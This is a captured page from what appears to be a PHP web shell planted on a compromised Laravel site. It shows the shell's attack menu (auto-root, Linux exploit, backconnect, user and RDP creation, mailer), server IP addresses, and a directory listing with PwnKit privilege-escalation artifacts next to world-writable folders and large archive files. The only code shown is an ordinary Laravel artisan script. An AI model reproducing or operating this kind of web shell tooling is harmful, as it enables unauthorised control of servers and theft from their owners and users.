Linux srv1.sbit.com.bd 5.14.0-503.21.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jan 12 09:45:05 EST 2025 x86_64
Apache
: 192.99.39.68 | : 216.73.216.165
Cant Read [ /etc/named.conf ]
8.2.29
gzmcfenigov
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gzmcfenigov /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxrwxrwx
bootstrap
[ DIR ]
drwxrwxrwx
cgi-bin
[ DIR ]
drwxrwxrwx
config
[ DIR ]
drwxrwxrwx
data
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
docker
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxrwxrwx
routes
[ DIR ]
drwxrwxrwx
storage
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
.cpanel.yml
105
B
-rw-rw-rw-
.editorconfig
258
B
-rw-rw-rw-
.env
1.81
KB
-rw-rw-rw-
.env-example
1.73
KB
-rw-rw-rw-
.gitattributes
186
B
-rw-rw-rw-
.gitignore
1009
B
-rw-rw-rw-
.htaccess
837
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
README.md
11
B
-rw-rw-rw-
app.zip
59.45
MB
-rw-r--r--
artisan
1.65
KB
-rw-rw-rw-
composer.json
2.55
KB
-rw-rw-rw-
composer.lock
384.44
KB
-rw-rw-rw-
error_log
252
B
-rw-r--r--
gzmc.zip
283.24
MB
-rw-r--r--
package-lock.json
24.47
KB
-rw-rw-rw-
package.json
321
B
-rw-rw-rw-
phpunit.xml
1.12
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
sail
16.89
KB
-rw-rw-rw-
vite.config.js
312
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : artisan
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any of our classes manually. It's great to relax. | */ require __DIR__.'/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);
Close